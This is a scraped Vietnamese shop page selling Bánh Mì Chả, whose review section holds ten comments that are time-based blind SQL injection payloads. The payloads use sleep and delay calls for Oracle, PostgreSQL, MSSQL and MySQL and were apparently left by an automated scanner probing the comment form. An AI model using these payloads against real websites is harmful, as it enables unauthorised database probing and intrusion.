Giỏ hàng của bạn trống!

Bánh Mì Chả

Tình trạng: Còn trong kho
25,000đ

Bánh mì là một món ăn rất đỗi quen thuộc được nhiều người Việt Nam yêu thích

Bánh Mì Chả

0

20 đánh giá

comment
         
15/10/2020

e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

comment
         
15/10/2020

UcGPtOBu')) OR 579=(SELECT 579 FROM PG_SLEEP(15))--

comment
         
15/10/2020

5iW47jvM') OR 497=(SELECT 497 FROM PG_SLEEP(15))--

comment
         
15/10/2020

KdTX85Ez' OR 101=(SELECT 101 FROM PG_SLEEP(15))--

comment
         
15/10/2020

W1pdp12f'; waitfor delay '0:0:15' --

comment
         
15/10/2020

1 waitfor delay '0:0:15' --

comment
         
15/10/2020

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

comment
         
15/10/2020

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

comment
         
15/10/2020

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

comment
         
15/10/2020

if(now()=sysdate(),sleep(15),0)

Hotline 0856688886